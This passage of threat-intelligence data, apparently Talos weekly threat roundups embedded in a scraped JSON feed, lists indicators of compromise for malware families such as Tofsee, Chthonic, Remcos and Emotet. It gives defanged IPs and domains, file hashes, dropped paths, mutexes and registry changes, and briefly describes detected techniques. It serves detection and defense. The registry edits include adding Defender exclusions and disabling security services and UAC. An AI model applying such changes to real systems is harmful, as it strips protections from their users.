`<HKLM>\SOFTWARE\MICROSOFT\WINDOWS DEFENDER\EXCLUSIONS\PATHS`, Value Name: `C:\Windows\SysWOW64\xqekjrxm` | 2
`<HKLM>\SOFTWARE\MICROSOFT\WINDOWS DEFENDER\EXCLUSIONS\PATHS`, Value Name: `C:\Windows\SysWOW64\qjxdckqf` | 2
`<HKLM>\SOFTWARE\MICROSOFT\WINDOWS DEFENDER\EXCLUSIONS\PATHS`, Value Name: `C:\Windows\SysWOW64\unbhgouj` | 1
`<HKLM>\SOFTWARE\MICROSOFT\WINDOWS DEFENDER\EXCLUSIONS\PATHS`, Value Name: `C:\Windows\SysWOW64\ibpvucix` | 1
`<HKLM>\SOFTWARE\MICROSOFT\WINDOWS DEFENDER\EXCLUSIONS\PATHS`, Value Name: `C:\Windows\SysWOW64\athnmuap` | 1
`<HKLM>\SOFTWARE\MICROSOFT\WINDOWS DEFENDER\EXCLUSIONS\PATHS`, Value Name: `C:\Windows\SysWOW64\tmagfnti` | 1
`<HKLM>\SOFTWARE\MICROSOFT\WINDOWS DEFENDER\EXCLUSIONS\PATHS`, Value Name: `C:\Windows\SysWOW64\piwcbjpe` | 1
`<HKLM>\SOFTWARE\MICROSOFT\WINDOWS DEFENDER\EXCLUSIONS\PATHS`, Value Name: `C:\Windows\SysWOW64\slzfemsh` | 1
`<HKLM>\SOFTWARE\MICROSOFT\WINDOWS DEFENDER\EXCLUSIONS\PATHS`, Value Name: `C:\Windows\SysWOW64\mftzygmb` | 1

IP Addresses contacted by malware. Does not indicate maliciousness | Occurrences
---|---
`239[.]255[.]255[.]250` | 15
`69[.]55[.]5[.]250` | 15
`46[.]4[.]52[.]109` | 15
`176[.]111[.]49[.]43` | 15
`85[.]25[.]119[.]25` | 15
`144[.]76[.]199[.]2` | 15
`144[.]76[.]199[.]43` | 15
`43[.]231[.]4[.]7` | 15
`192[.]0[.]47[.]59` | 15
`74[.]125[.]192[.]26` | 15
`168[.]95[.]5[.]117` | 15
`98[.]137[.]159[.]25` | 15
`188[.]125[.]73[.]87` | 14
`172[.]217[.]12[.]228` | 14
`213[.]205[.]33[.]62` | 14
`212[.]82[.]101[.]46` | 13
`67[.]195[.]228[.]106` | 13
`168[.]95[.]6[.]59` | 13
`74[.]6[.]137[.]65` | 13
`96[.]114[.]157[.]80` | 13
`213[.]209[.]1[.]129` | 12
`66[.]218[.]85[.]139` | 12
`213[.]205[.]33[.]61` | 12
`67[.]195[.]228[.]110` | 12
`209[.]85[.]202[.]26` | 12

*See JSON for more IOCs

Domain Names contacted by malware. Does not indicate maliciousness | Occurrences
---|---
`250[.]5[.]55[.]69[.]in-addr[.]arpa` | 15
`250[.]5[.]55[.]69[.]zen[.]spamhaus[.]org` | 15
`250[.]5[.]55[.]69[.]cbl[.]abuseat[.]org` | 15
`mta5[.]am0[.]yahoodns[.]net` | 15
`mx-eu[.]mail[.]am0[.]yahoodns[.]net` | 15
`250[.]5[.]55[.]69[.]dnsbl[.]sorbs[.]net` | 15
`whois[.]iana[.]org` | 15
`250[.]5[.]55[.]69[.]bl[.]spamcop[.]net` | 15
`whois[.]arin[.]net` | 15
`250[.]5[.]55[.]69[.]sbl-xbl[.]spamhaus[.]org` | 15
`hotmail-com[.]olc[.]protection[.]outlook[.]com` | 15
`microsoft-com[.]mail[.]protection[.]outlook[.]com` | 15
`honeypus[.]rusladies[.]cn` | 15
`marina99[.]ruladies[.]cn` | 15
`eur[.]olc[.]protection[.]outlook[.]com` | 14
`mx-aol[.]mail[.]gm0[.]yahoodns[.]net` | 13
`aol[.]com` | 13
`msx-smtp-mx1[.]hinet[.]net` | 13
`ipinfo[.]io` | 12
`smtp-in[.]libero[.]it` | 12
`libero[.]it` | 12
`tiscali[.]it` | 12
`etb-1[.]mail[.]tiscali[.]it` | 12
`tiscalinet[.]it` | 12
`mx3[.]qq[.]com` | 12

*See JSON for more IOCs

Files and or directories created | Occurrences
---|---
`%SystemRoot%\SysWOW64\config\systemprofile` | 15
`%SystemRoot%\SysWOW64\config\systemprofile:.repos` | 15
`%TEMP%\<random, matching '[a-z]{8}'>.exe` | 15
`%SystemRoot%\SysWOW64\<random, matching '[a-z]{8}'>` | 15
`%System32%\<random, matching '[a-z]{8}\[a-z]{6,8}'>.exe (copy)` | 14
`%TEMP%\ondzgch.exe` | 1
`%TEMP%\rqgcjfk.exe` | 1
`%TEMP%\baqmtpu.exe` | 1
`%TEMP%\qpfbiej.exe` | 1

#### File Hashes

```
03014df764784dff0d3c56cccdbfb07ca0c04cdbd302403ebedc466e83e18f6c
0c30a1e0c3e91cbaf62beb5e217b44f5065f7e97c19d0eb181e0d37720be178d
213b7ea1e4fee2c08e48c1536b099ab55b0ace638710a8c1920a834ac80648b5
23dc9f05f6003f3730b5731072eb9754fbf80a353cdbe94704a5e425a18aa0e5
31702562438866f49dddb8c0fc8e6d9b68ec2eb73b142c899479102850de0fdd
398288b17c7ffc8b569ac4c8623cb4e1dc4c97da2a021bfd86182fd23e92735c
5a3fe5af1026e7f6217e91cc4b6d1c888efde908369b1b8a216c6e954c648d3d
5d9dc6e667bd105d7e2e77162e87e94b0c5a72be94c1ae726e45ccf4d23753bb
7c73e7cfd0be419b1538309b2a5fb45a2515808fe92492db79e0cbbdce976643
8895dda1641282ea209e8482269cb7c34f2da9843c9d0293fc3d6aec2612e212
8ef82ce7ed1ed7c6ddd446b4a8a7144acac21aab0af0ee82ac764b525ea00b07
b9c035fd6f4d2a6b8d619812b98764885927b80f3a8369e87495f95b2bcbf44d
d2f043f4002cdcbd88319a360dc11a0aec1ebae63f37ef9a845beb23779a1151
e42a5b04986cbdc9c13fcb99b2e1e0a2d156e6faaf1369ed71a92220a1347f06
e4c584dd32770439810067fe8607f74a64380fe354725ff4a5d42215b873b1e1
```

#### Coverage

Product | Protection
---|---
Amp | 
Cloudlock | N/A
Cws | 
Email Security | 
Network Security | 
Stealthwatch | N/A
Stealthwatch Cloud | N/A
Threat Grid | 
Umbrella | 
Wsa | 

#### Screenshots of Detection

#### AMP

![AMP detection screenshot](<https://1.bp.blogspot.com/-QK5Wqh41b5o/XU3Q6hoziYI/AAAAAAAACUI/sMvphMDkpkEaIaw_trTCeaGDfHwtf0F9gCLcBGAs/s1600/5d9dc6e667bd105d7e2e77162e87e94b0c5a72be94c1ae726e45ccf4d23753bb_amp.png>)

#### ThreatGrid

![ThreatGrid detection screenshot](<https://1.bp.blogspot.com/-DLX6v1K4KyU/XU3Q_QVOokI/AAAAAAAACUM/ki5QgXGwU54XUE5f6J1yjpyfFCZ0TeTngCLcBGAs/s1600/5d9dc6e667bd105d7e2e77162e87e94b0c5a72be94c1ae726e45ccf4d23753bb_tg.png>)

#### Umbrella

![Umbrella detection screenshot](<https://1.bp.blogspot.com/-8dV01_lMY_8/XU3RFX7nf-I/AAAAAAAACUQ/xWLg3y2zLOIKtVzwVKAqEr7sKlaOgGbkQCLcBGAs/s1600/213b7ea1e4fee2c08e48c1536b099ab55b0ace638710a8c1920a834ac80648b5_umbrella.png>)

### Win.Malware.Chthonic-7101817-1

#### Indicators of Compromise

Registry Keys | Occurrences
---|---
`<HKLM>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\EXPLORER\RUN` | 25
`<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\ADVANCED`, Value Name: `Hidden` | 24
`<HKLM>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\SYSTEM`, Value Name: `EnableLUA` | 24
`<HKLM>\SYSTEM\CONTROLSET001\SERVICES\WSCSVC`, Value Name: `Start` | 24
`<HKLM>\SYSTEM\CONTROLSET001\SERVICES\WINDEFEND`, Value Name: `Start` | 24
`<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\ADVANCED`, Value Name: `ShowSuperHidden` | 24
`<HKLM>\SYSTEM\CONTROLSET001\SERVICES\SHAREDACCESS`, Value Name: `Start` | 24
`<HKLM>\SYSTEM\CONTROLSET001\SERVICES\MPSSVC`, Value Name: `Start` | 24
`<HKLM>\SYSTEM\CONTROLSET001\SERVICES\WUAUSERV`, Value Name: `Start` | 24
`<HKLM>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\EXPLORER`, Value Name: `TaskbarNoNotification` | 24
`<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\EXPLORER`, Value Name: `TaskbarNoNotification` | 24
`<HKLM>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\EXPLORER`, Value Name: `HideSCAHealth` | 24
`<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\EXPLORER`, Value Name: `HideSCAHealth` | 24
`<HKLM>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\EXPLORER\RUN`, Value Name: `2827271685` | 24

IP Addresses contacted by malware. Does not indicate maliciousness | Occurrences
---|---
`20[.]45[.]1[.]107` | 21
`40[.]91[.]124[.]111` | 21
`192[.]42[.]119[.]41` | 18
`40[.]67[.]189[.]14` | 15
`20[.]41[.]46[.]145` | 8
`192[.]42[.]116[.]41` | 6
`40[.]90[.]247[.]210` | 2

Domain Names contacted by malware. Does not indicate maliciousness | Occurrences
---|---
`dnshkjashsdk3d111[.]ru` | 24
`www[.]update[.]microsoft[.]com[.]nsatc[.]net` | 21

Files and or directories created | Occurrences
---|---
`\TEMP\005F5E~1.EXE` | 1
`\TEMP\1B106F~1.EXE` | 1
`\TEMP\0956E4~1.EXE` | 1
`\TEMP\382BAE~1.EXE` | 1
`\TEMP\00BA93~1.EXE` | 1
`\TEMP\12CC7F~1.EXE` | 1

#### File Hashes

```
005f5e12924dad7fe014a84db45f13429f6ece0b8247f5d352d715b2846c0c4f
00ba939c36fa3b49267f278dc9bb198bc9ae990ce888720048bea52a40cf1c23
0956e4f5453664330032f4d772aba4fc67c67543ca6b5b5970277d3509c0b947
12cc7fd46b6a47ac1c87526633c7a608d31275b31c885f8f47bb994d8ae19e90
17e720effe9bb9123f12df8149180130f8239870cf0d9267f67cf476b6ab44e5
1b106ffffabfe8c46bca9ad44e1fd47a2150a99a701452d4a6d2e51fb968a1af
382baee7e059546686749c2e25e7077db13f724e67629aa253033b53c4aff934
38fa5765572ad2cd028f6aa284d0b780b881d390dd5a8ae32c06d39e7442c026
42c5dd7eebdd5bd210832a6588259e33e737208817c4c1817615b3995c3ac378
4471cabd599d69896184f4e9264f377961488fb4c6cdf41992e0f5b2096c9899
46901064a8beca5f66dd0e9072feab0abb6ec3223b54f6bad81959a306915b47
62828391fca3a6d82749ca15cd2eb5d28153001457df7f1806377235a95603f5
63641d47b507920bd79600352d71655abed663ebe9347ccc5f7841b9dcb95d1b
73b71b837f43a97bfab5c6f541d54b7b090fef3893a0e78b769140a946ba162a
75da2447c69b6b0d78ace3c73e9302688b46cf1bdddac5c61d0c7c8403d39036
7a38d305151c979898e46d7d52dcb8bd4dc67485415a7d122c81facd320bcba8
8be6459aa2282ae9cf52ec766d7c8c55721988ba866339e358d15ae47fbae61f
8c1ab54da3a2372a624d22d902278e048942e9a495b71d330f1eee4073b14eb7
8c495bba75c5ab08e66063bd323525502188899663ad8ac5183baa2a42583bb8
8e3fd8961f232fdbf26019c56901c76db886ed56f86fba8c2f3f0631d33f969e
a7316bed0f3820f1ca51eb4c687c763d059d086b610a4250a4051d795b47fd44
acc883924cc2e4b6f5f979a2586e2246a9837faa07702c6a18f90a086d681796
aebb9e807054a61b9125efa05507a9e2cdc6812bd286c007367713d1f377b514
b01cefc142aee229491e1b19a32888b921f1935c4d472807b7d115dc568356e4
b50a5542b24d20aa60a3614699c36f4f75062c7492955b9785fad0df4d0c1525
```

*See JSON for more IOCs

#### Coverage

Product | Protection
---|---
Amp | 
Cloudlock | N/A
Cws | 
Email Security | 
Network Security | 
Stealthwatch | N/A
Stealthwatch Cloud | N/A
Threat Grid | 
Umbrella | 
Wsa | 

#### Screenshots of Detection

#### AMP

![AMP detection screenshot](<https://1.bp.blogspot.com/-H1zjQzyl6yI/XU3RWxuA7bI/AAAAAAAACUg/sh3k5-9fGvc9qmOHzPATQBhNiRqPi9sGgCLcBGAs/s1600/a7316bed0f3820f1ca51eb4c687c763d059d086b610a4250a4051d795b47fd44_amp.png>)

#### ThreatGrid

![ThreatGrid detection screenshot](<https://1.bp.blogspot.com/-rMo2F4NgHYw/XU3RbGvDnjI/AAAAAAAACUk/UMseNSNGYAUgPb-fm091l6WcgTk3wdz5wCLcBGAs/s1600/a7316bed0f3820f1ca51eb4c687c763d059d086b610a4250a4051d795b47fd44_tg.png>)

#### Umbrella

![Umbrella detection screenshot](<https://1.bp.blogspot.com/-BDpwznCi30I/XU3RgVhoJ7I/AAAAAAAACUo/5RxS4nSS59osV7OJ3wsnboj_yF6KpHEaACLcBGAs/s1600/a7316bed0f3820f1ca51eb4c687c763d059d086b610a4250a4051d795b47fd44_umbrella.png>)

### Win.Malware.Remcos-7101023-0

#### Indicators of Compromise

Registry Keys | Occurrences
---|---
`<HKCU>\SOFTWARE\REMCOS-LOPOXR` | 25
`<HKCU>\SOFTWARE\REMCOS-LOPOXR`, Value Name: `exepath` | 25
`<HKCU>\SOFTWARE\REMCOS-LOPOXR`, Value Name: `lic` | 25

Mutexes | Occurrences
---|---
`Remcos_Mutex_Inj` | 25
`Remcos-LOPOXR` | 25

IP Addresses contacted by malware. Does not indicate maliciousness | Occurrences
---|---
`95[.]140[.]125[.]58` | 25

Files and or directories created | Occurrences
---|---
`%SystemRoot%\Tasks\Stencilens0.job` | 25
`%APPDATA%\antepenuit.pif` | 25
`%System32%\Tasks\Stencilens0` | 25

#### File Hashes

```
081f8d61a3cd912e00e9f53f6a8a3923164cb86205cdaab63abd9b2814ed9777
0a7cfd1b34af81f40d8f05f85bcfa9139bf9ec2eff82fcda1fba409b5a7650f2
0bed354bdcb152cbd012fe1c37d53c8c02da11c11084e8eb83bf577bdd80a464
0d0a83234404e0c08958aafcb6910f6cdfd7dc75d9713bf654c89b99fc341bdc
0d271c5c9ca84e2ab86f6c95d32802e7ec64b846d07b7bf81d0f82409b1b2101
1092677328703cc000e9c63be2b0a2f46103c14f053e9ee079ffd7f0ca2d6f8f
1831367e74cc96e0f72ec11f054525e6c024215bde7b61f110f9b73338ce03cf
1a801a28dfffaea7742f1d467a2c80bb8632b39db214d22abc804f0bc6515cc6
2027c7d8d4403334509ae483d7e0c8be28640a39d4bd9441f87cdc259b92ca4c
2e16d6892291790348a9ebe49ca192925a8db1a7a286c0fbb44c30ba1dff74e2
354c76d9316c5ba1edd6b052f361ec42e925b878915879c1ca903f81b05bfd7b
36c6f434e27087f707a813495e82bdbeac383507ce5a2ca3816e4557a4cddb5e
376746cbbf27f98f9f07676bdb6a5e556fee27b1ae1c388416f17d5e4bc4c62f
392474631d8c58ec089b896569d6e362484865b479c85e2c0906b87349bce68f
3adb3198ca6ac80a842b6aba596fef43eda6aca0f32dbdf59d60133eabde541d
40b75ec8743801bfcbac60c8f0b232971aa61bfb031fe829132a8537c63b9a41
40cf7790bd379a14cecc933b48e6f341164ad872d5ee61136b91092cbfe14aba
49c149ba04e9af98c5da19d305556af3d7cdacf6e2044abfef604b0e5bb38d29
54a0550408c68795a9652e18a4e3820cca6c16246c2e8198497e795dba448644
585061420029af8f635eefe1834874a422d140b8adfbc77d0e789ea9d4ade500
5914996ccdfda579afbd3116cae43d5bd35db5eee27545a60ddef3270af351f1
5a756ce1c997dd1615ea2fc97e5dd3cfcbc29a5f848e5ea6ede37e3d526d4ce3
5e7c49bef106709d6cfc9d85b8d82dc0583f42c1701cb7990e700914db842186
5f9034f63a3cf362b1d2f7baf35a7fadceccd2add363bf7ef3cae4e95a6afb86
5faf5309caaeb3ed3d1b4825b55646c83d769d22c226420bb6418e037cd2f029
```

*See JSON for more IOCs

#### Coverage

Product | Protection
---|---
\nAmp |  \nCloudlock | N/A \nCws |  \nEmail Security |  \nNetwork Security | N/A \nStealthwatch | N/A \nStealthwatch Cloud | N/A \nThreat Grid |  \nUmbrella | N/A \nWsa | N/A \n \n#### Screenshots of Detection\n\n#### AMP\n\n[](<https://1.bp.blogspot.com/-4z-4bO77Lzs/XU3RwPft74I/AAAAAAAACU0/uoDbEVkJTKQRWVGv4W95-TFIoXCCY3B8ACLcBGAs/s1600/392474631d8c58ec089b896569d6e362484865b479c85e2c0906b87349bce68f_amp.png>)\n\n \n\n\n#### ThreatGrid\n\n[](<https://1.bp.blogspot.com/-NxfAdHYHNiY/XU3R1DOsDEI/AAAAAAAACU8/5wVY6_4vSeQfByumNeNjjHwOKVQznQuYACLcBGAs/s1600/392474631d8c58ec089b896569d6e362484865b479c85e2c0906b87349bce68f_tg.png>)\n\n \n\n\n \n\n\nExploit Prevention\n\nCisco AMP for Endpoints protects users from a variety of malware functions with exploit prevention. Exploit prevention helps users defend endpoints from memory attacks commonly used by obfuscated malware and exploits. These exploits use certain features to bypass typical anti-virus software, but were blocked by AMP thanks to its advanced scanning capabilities, even protecting against zero-day vulnerabilities. \nCVE-2019-0708 detected \\- (2337) \n--- \nAn attempt to exploit CVE-2019-0708 has been detected. The vulnerability, dubbed BlueKeep, is a heap memory corruption which can be triggered by sending a specially crafted Remote Desktop Protocol (RDP request). Since this vulnerability can be triggered without authentication and allows remote code execution, it can be used by worms to spread automatically without human interaction. \nMadshi injection detected \\- (1399) \nMadshi is a code injection framework that uses process injection to start a new thread if other methods to start a thread within a process fail. This framework is used by a number of security solutions. It is also possible for malware to use this technique. \nTrickbot malware detected \\- (1212) \nTrickbot is a banking Trojan which appeared in late 2016. 
Due to the similarities between Trickbot and Dyre, it is suspected some of the individuals responsible for Dyre are now responsible for Trickbot. Trickbot has been rapidly evolving over the months since it has appeared. However, Trickbot is still missing some of the capabilities Dyre possessed. Its current modules include DLL injection, system information gathering, and email searching. \nExcessively long PowerShell command detected \\- (1002) \nA PowerShell command with a very long command line argument that may indicate an obfuscated script has been detected. PowerShell is an extensible Windows scripting language present on all versions of Windows. Malware authors use PowerShell in an attempt to evade security software or other monitoring that is not tuned to detect PowerShell based threats. \nKovter injection detected \\- (466) \nA process was injected into, most likely by an existing Kovter infection. Kovter is a click fraud Trojan that can also act as an information stealer. Kovter is also file-less malware meaning the malicious DLL is stored inside Windows registry and injected directly into memory using PowerShell. It can detect and report the usage of monitoring software such as wireshark and sandboxes to its C2. It spreads through malicious advertising and spam campaigns. \nProcess hollowing detected \\- (297) \nProcess hollowing is a technique used by some programs to avoid static analysis. In typical usage, a process is started and its obfuscated or encrypted contents are unpacked into memory. The parent then manually sets up the first stages of launching a child process, but before launching it, the memory is cleared and filled in with the memory from the parent instead. \nGamarue malware detected \\- (152) \nGamarue is a family of malware that can download files and steal information from an infected system. Worm variants of the Gamarue family may spread by infecting USB drives or portable hard disks that have been plugged into a compromised system. 
\nDealply adware detected \\- (118) \nDealPly is adware, which claims to improve your online shopping experience. It is often bundled into other legitimate installers and is difficult to uninstall. It creates pop-up advertisements and injects advertisements on webpages. Adware has also been known to download and install malware. \nPossible fileless malware download \\- (95) \nA site commonly used by fileless malware to download additional data has been detected. Several different families of malware have been observed using these sites to download additional stages to inject into other processes. \nIcedID malware detected \\- (52) \nIcedID is a banking Trojan. It uses both web browser injection and browser redirection to steal banking and/or other financial credentials and data. The features and sophistication of IcedID demonstrate the malware author's knowledge and technical skill for this kind of fraud, and suggest the authors have previous experience creating banking Trojans. IcedID has been observed being installed by Emotet or Ursnif. Systems infected with IcedID should also be scanned for additional malware infections. \n", "cvss3": {}, "published": "2019-08-09T13:28:08", "type": "talosblog", "title": "Threat Roundup for August 2 to August 9", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2019-0708"], "modified": "2019-08-09T13:28:08", "id": "TALOSBLOG:62182E90D88C9282869F40D834CA56BA", "href": "http://feedproxy.google.com/~r/feedburner/Talos/~3/6_zbjoDpG84/threat-roundup-0802-0809.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-12-20T19:22:56", "description": "[](<https://1.bp.blogspot.com/-YY2FQl9WGXA/XURYSq-inGI/AAAAAAAAACc/Ko8Q3jzMHrs2tIOdnt-yO6QVWhNtZBrPwCLcBGAs/s1600/recurring%2Bblog%2Bimages_threat%2Broundup.jpg>)\n\nToday, Talos is publishing a glimpse into the most prevalent threats we've observed between Dec. 13 and Dec. 20. 
As with previous roundups, this post isn't meant to be an in-depth analysis. Instead, this post will summarize the threats we've observed by highlighting key behavioral characteristics, indicators of compromise, and discussing how our customers are automatically protected from these threats. \n \nAs a reminder, the information provided for the following threats in this post is non-exhaustive and current as of the date of publication. Additionally, please keep in mind that IOC searching is only one part of threat hunting. Spotting a single IOC does not necessarily indicate maliciousness. Detection and coverage for the following threats are subject to updates, pending additional threat or vulnerability analysis. For the most current information, please refer to your Firepower Management Center, Snort.org, or ClamAV.net. \n \nFor each threat described below, this blog post only lists 25 of the associated file hashes and up to 25 IOCs for each category. An accompanying JSON file can be found [here](<https://alln-extcloud-storage.cisco.com/blogs/1/2019/12/tru.json_.txt>) that includes the complete list of file hashes, as well as all other IOCs from this post. As always, please remember that all IOCs contained in this document are indicators, and one single IOC does not indicate maliciousness. \nThe most prevalent threats highlighted in this roundup are: \nThreat Name | Type | Description \n---|---|--- \nDoc.Downloader.Emotet-7451163-0 | Downloader | Emotet is one of the most widely distributed and active malware families today. It is a highly modular threat that can deliver a wide variety of payloads. Emotet is commonly delivered via Microsoft Office documents with macros, sent as attachments on malicious emails. \nWin.Dropper.TrickBot-7455405-0 | Dropper | Trickbot is a banking trojan targeting sensitive information for certain financial institutions. This malware is frequently distributed through malicious spam campaigns. 
Many of these campaigns rely on downloaders for distribution, such as VB scripts. \nWin.Packed.Dridex-7447905-1 | Packed | Dridex is a well-known banking trojan that aims to steal credentials and other sensitive information from an infected machine. \nWin.Packed.Razy-7450491-0 | Packed | Razy is oftentimes a generic detection name for a Windows trojan. It collects sensitive information from the infected host, encrypts the data, and sends it to a command and control (C2) server. Information collected might include screenshots. The samples modify auto-execute functionality by setting and creating a value in the registry for persistence. \nWin.Dropper.NetWire-7454096-1 | Dropper | NetWire is a remote access trojan (RAT) that allows attackers to execute commands on the infected host, log keystrokes, interact with a webcam, remote desktop, and read data from connected USB devices. NetWire is commonly delivered through Microsoft Office documents with macros, sent as attachments on malicious emails. \nWin.Trojan.Tofsee-7450732-0 | Trojan | Tofsee is multi-purpose malware that features a number of modules used to carry out various activities such as sending spam messages, conducting click fraud, mining cryptocurrency and more. Infected systems become part of the Tofsee spam botnet and are used to send large volumes of spam messages in an effort to infect additional systems and increase the overall size of the botnet under the operator's control. \nDoc.Downloader.Sagent-7454309-0 | Downloader | Sagent downloads and executes a binary using PowerShell from a Microsoft Word document. \nWin.Malware.Gandcrab-7454521-1 | Malware | Gandcrab is ransomware that encrypts documents, photos, databases and other important files using the file extension \".GDCB,\" \".CRAB\" or \".KRAB\". Gandcrab is spread through both traditional spam campaigns, as well as multiple exploit kits, including Rig and Grandsoft. 
\nWin.Trojan.HawkEye-7455512-1 | Trojan | Hawkeye is an information stealing malware that specifically targets usernames and passwords stored by web browsers and mail clients on an infected machine. It is commonly spread via email and can also propagate through removable media. \n \n* * *\n\n## Threat Breakdown\n\n### Doc.Downloader.Emotet-7451163-0\n\n#### Indicators of Compromise\n\nRegistry Keys | Occurrences \n---|--- \n`<HKLM>\\SOFTWARE\\CLASSES\\WOW6432NODE\\INTERFACE\\{BEF6E003-A874-101A-8BBA-00AA00300CAB} ` | 10 \n`<HKU>\\.DEFAULT\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS\\WPAD\\{E54C0DDD-6FAB-4796-8BBE-EE37AF7CD25A} ` | 2 \n`<HKU>\\.DEFAULT\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS \nValue Name: ProxyEnable ` | 2 \n`<HKU>\\.DEFAULT\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS \nValue Name: ProxyServer ` | 2 \n`<HKU>\\.DEFAULT\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS \nValue Name: ProxyOverride ` | 2 \n`<HKU>\\.DEFAULT\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS \nValue Name: AutoConfigURL ` | 2 \n`<HKU>\\.DEFAULT\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS \nValue Name: AutoDetect ` | 2 \n`<HKU>\\.DEFAULT\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS\\WPAD\\{E54C0DDD-6FAB-4796-8BBE-EE37AF7CD25A} \nValue Name: WpadDecisionReason ` | 2 \n`<HKU>\\.DEFAULT\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS\\WPAD\\{E54C0DDD-6FAB-4796-8BBE-EE37AF7CD25A} \nValue Name: WpadDecision ` | 2 \n`<HKU>\\.DEFAULT\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS\\WPAD\\{E54C0DDD-6FAB-4796-8BBE-EE37AF7CD25A} \nValue Name: WpadNetworkName ` | 2 \n`<HKU>\\.DEFAULT\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS\\WPAD\\{E54C0DDD-6FAB-4796-8BBE-EE37AF7CD25A} \nValue Name: WpadDetectedUrl ` | 2 \n`<HKU>\\.DEFAULT\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS\\WPAD 
` | 2 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\FUNCSITKA ` | 2 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\FUNCSITKA \nValue Name: Type ` | 2 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\FUNCSITKA \nValue Name: Start ` | 2 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\FUNCSITKA \nValue Name: ErrorControl ` | 2 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\FUNCSITKA \nValue Name: ImagePath ` | 2 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\FUNCSITKA \nValue Name: DisplayName ` | 2 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\FUNCSITKA \nValue Name: WOW64 ` | 2 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\FUNCSITKA \nValue Name: ObjectName ` | 2 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\FUNCSITKA \nValue Name: Description ` | 2 \n`<HKU>\\.DEFAULT\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS\\WPAD\\{E54C0DDD-6FAB-4796-8BBE-EE37AF7CD25A} \nValue Name: WpadDecisionTime ` | 2 \n`<HKCR>\\TYPELIB\\{C4EDCADC-BC75-481F-8A40-032075206B43}\\2.0\\FLAGS ` | 1 \n`<HKCR>\\TYPELIB\\{C4EDCADC-BC75-481F-8A40-032075206B43}\\2.0\\0 ` | 1 \n`<HKCR>\\TYPELIB\\{C4EDCADC-BC75-481F-8A40-032075206B43}\\2.0\\0\\WIN32 ` | 1 \nMutexes | Occurrences \n---|--- \n`Global\\I98B68E3C` | 2 \n`Global\\M98B68E3C` | 2 \nIP Addresses contacted by malware. 
Does not indicate maliciousness | Occurrences \n---|--- \n`100[.]108[.]65[.]228` | 8 \n`100[.]116[.]148[.]111` | 8 \n`100[.]112[.]136[.]191` | 8 \n`100[.]89[.]177[.]62` | 8 \n`100[.]93[.]135[.]190` | 8 \n`168[.]235[.]82[.]183` | 2 \n`96[.]234[.]38[.]186` | 2 \n`120[.]51[.]83[.]89` | 2 \n`204[.]197[.]244[.]176` | 2 \n`149[.]202[.]153[.]251` | 1 \n`103[.]47[.]185[.]215` | 1 \n`107[.]180[.]41[.]254` | 1 \n`69[.]16[.]254[.]127` | 1 \n`82[.]145[.]43[.]153` | 1 \n`139[.]255[.]47[.]211` | 1 \n`37[.]228[.]137[.]204` | 1 \n`157[.]7[.]231[.]227` | 1 \n`202[.]238[.]198[.]32` | 1 \n`202[.]238[.]198[.]30` | 1 \n`60[.]36[.]166[.]212` | 1 \n`192[.]1[.]4[.]230` | 1 \n`50[.]31[.]174[.]165` | 1 \n`113[.]43[.]208[.]199` | 1 \n`202[.]130[.]62[.]24` | 1 \n`103[.]253[.]113[.]131` | 1 \n \n*See JSON for more IOCs\n\nDomain Names contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`adichip[.]com` | 10 \n`grafdesign[.]pl` | 8 \n`dcjohnsonassociates[.]com` | 8 \n`global-ark[.]co[.]jp` | 8 \n`acadmi[.]co[.]uk` | 8 \n`mail[.]1and1[.]com` | 1 \n`587[.]hexabyte[.]tn` | 1 \n`child-pro[.]com` | 1 \n`imap[.]e-apamanshop[.]com` | 1 \n`sg2plcpnl0259[.]prod[.]sin2[.]secureserver[.]net` | 1 \n`mx1[.]retailconnection[.]co[.]za` | 1 \n`smtp[.]consulmexrio[.]com[.]br` | 1 \n`mail[.]ahg[.]com[.]mx` | 1 \n`mail[.]cassado[.]com[.]pe` | 1 \n`pop[.]aoishokai[.]co[.]jp` | 1 \n`mail[.]thebasechurch[.]org` | 1 